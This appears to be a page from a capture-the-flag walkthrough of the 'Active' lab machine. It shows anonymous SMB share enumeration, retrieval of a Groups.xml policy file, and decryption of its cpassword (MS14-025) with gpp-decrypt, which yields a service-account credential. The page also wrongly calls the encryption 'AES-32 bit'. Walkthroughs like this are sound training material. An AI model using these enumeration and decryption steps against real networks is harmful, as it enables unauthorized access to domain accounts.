SMB - 445

Anonymous access is allowed and we can list shares.

smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445	Name: 10.10.10.100                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

Going through the replication share:

smbclient -N //10.10.10.100/Replication

Replication/
└── Policies/
    └── {GUID}/
        ├── GPT.INI                 # Defines the Group Policy Template version
        ├── Machine/                # Contains machine-specific policies
        │   ├── Registry.pol        # Registry settings for the machine
        │   ├── Scripts/            # Startup/shutdown scripts
        │   ├── Preferences/        # Group Policy Preferences settings
        ├── User/                   # Contains user-specific policies
        │   ├── Registry.pol        # Registry settings for the user
        │   ├── Scripts/            # Logon/logoff scripts
        │   ├── Preferences/        # User-specific preferences
        ├── ADM/                    # Administrative Templates (older GPOs)
        ├── GPT.CACHE/              # Cached policy settings
        └── GPO.XML                 # XML representation of the policy (newer versions)

MS14-025

We find a file:

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 05:37:44 2018
  ..                                  D        0  Sat Jul 21 05:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 15:46:06 2018

		5217023 blocks of size 4096. 279100 blocks available

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

We find our first set of credentials set. Password here is encrypted. After a bit of googling I learned about the MS14-025 vulnerability. The cpassword is encrypted with a weak AES-32 bit algorithm and MS also posted the key in their docs.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Here it is: active.htb\SVC_TGS:GPPstillStandingStrong2k18

PreviousEnumeration NextFoothold

Last updated 1 year ago